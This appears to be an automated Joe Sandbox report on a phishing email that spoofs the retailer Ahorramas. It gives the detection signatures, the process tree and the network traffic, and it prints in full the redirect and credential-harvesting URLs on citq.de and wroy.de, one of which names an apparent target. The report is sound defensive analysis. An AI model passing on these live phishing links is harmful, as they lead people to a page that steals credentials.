Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
704b67b5-6bc9-dbd5-0710-60eb98e03983.eml

Overview

General Information

Sample name:704b67b5-6bc9-dbd5-0710-60eb98e03983.eml
Analysis ID:1556391
MD5:348b6a46a2bf44ee4bdc077ce4fae7c8
SHA1:ce01869c074679099fbf7dbcfa12761222a9d0e2
SHA256:5459a8aa83420fb1e0415d196aa163e58abeba21c8f4f1e1888a255a528b0265
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected potential phishing Email
AI detected suspicious URL
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
Invalid 'forgot password' link found
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory
Stores large binary data to the registry
Submit button contains javascript call

Classification

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 2528 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\704b67b5-6bc9-dbd5-0710-60eb98e03983.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6952 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "433F257D-565F-4ACE-9A4A-77EDAE2242C0" "841D5194-392F-4B0D-90F2-91DE94DB94BC" "2528" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 3680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2028,i,14780805822871355243,6275632994344914433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Office Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2528, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

barindex
AI detected phishing page
Source: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6HyzvkJoe Sandbox AI: Score: 9 Reasons: The brand 'AhorrasMas' is a known brand, likely associated with the domain 'ahorramas.com'., The provided URL 'tdmmv2467vengtbhl3e.citq.de' does not match the legitimate domain for AhorrasMas., The URL contains a random string and a different domain extension '.de', which is not typically associated with AhorrasMas., The presence of a subdomain with random characters is a common tactic used in phishing attempts., The input fields labeled as 'unknown' suggest a lack of clear purpose, which is suspicious. DOM: 1.1.pages.csv
AI detected potential phishing Email
Source: EmailJoe Sandbox AI: Detected potential phishing email: The sender's email domain 'denasabuildcon.com' does not match the claimed organization Ahorramas. The email contains suspicious URLs with random strings and redirects through 'citq.de' instead of legitimate ahorramas.com domain. Multiple repetitive content and suspicious formatting suggests automated phishing template
AI detected suspicious URL
Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://ahorramas-5ocglii6fvrlmr.wroy.de
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: https://ahorramas-5ocglii6fvrlmr.wroy.de
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Number of links: 0
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6HyzvkHTTP Parser: Base64 decoded: 1731664847.000000
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Forgot my password
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Terms of use
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Privacy & cookies
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Terms of use
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Privacy & cookies
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Terms of use
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Privacy & cookies
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Terms of use
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Privacy & cookies
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: On click: return checkmyEmail()
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: On click: return submitfirst()
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: On click: return checkmyEmail()
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: On click: return submitfirst()
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: <input type="password" .../> found
Source: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6HyzvkHTTP Parser: No favicon
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: No favicon
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: No favicon
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: No <meta name="author".. found
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: No <meta name="author".. found
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: No <meta name="copyright".. found
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:65416 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
Source: global trafficDNS traffic detected: DNS query: tdmmv2467vengtbhl3e.citq.de
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ahorramas-5ocglii6fvrlmr.wroy.de
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65392
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65393
Source: unknownNetwork traffic detected: HTTP traffic on port 65390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65390
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65391
Source: unknownNetwork traffic detected: HTTP traffic on port 65361 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65396
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65397
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65394
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65395
Source: unknownNetwork traffic detected: HTTP traffic on port 65355 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65378 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65398 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65389
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65387
Source: unknownNetwork traffic detected: HTTP traffic on port 65381 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65388
Source: unknownNetwork traffic detected: HTTP traffic on port 65406 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65364 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65417 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65395 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 65403 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65398
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65399
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65367 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65363 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65418 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65392 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65410 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 65404 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 65383 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65366 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 65389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65358 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65372 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65415 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65397 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 65369 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 65401 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65353
Source: unknownNetwork traffic detected: HTTP traffic on port 65394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65416 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65371 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65359 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65368 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65385 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65360
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65363
Source: unknownNetwork traffic detected: HTTP traffic on port 65360 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65364
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65361
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65362
Source: unknownNetwork traffic detected: HTTP traffic on port 65356 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65391 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65413 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65377 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65353 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65407 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65356
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65354
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65355
Source: unknownNetwork traffic detected: HTTP traffic on port 65380 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65358
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65359
Source: unknownNetwork traffic detected: HTTP traffic on port 65388 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65370
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65371
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65374
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65375
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65372
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65373
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65414 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65373 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65396 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65399 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65406
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65407
Source: unknownNetwork traffic detected: HTTP traffic on port 65354 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65367
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65368
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65401
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65365
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65366
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65404
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65369
Source: unknownNetwork traffic detected: HTTP traffic on port 65400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65387 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65403
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65381
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65382
Source: unknownNetwork traffic detected: HTTP traffic on port 65362 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65380
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65385
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65386
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65383
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65384
Source: unknownNetwork traffic detected: HTTP traffic on port 65393 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65379 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65376 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65411 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65417
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65418
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65378
Source: unknownNetwork traffic detected: HTTP traffic on port 65382 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65411
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65379
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65412
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65376
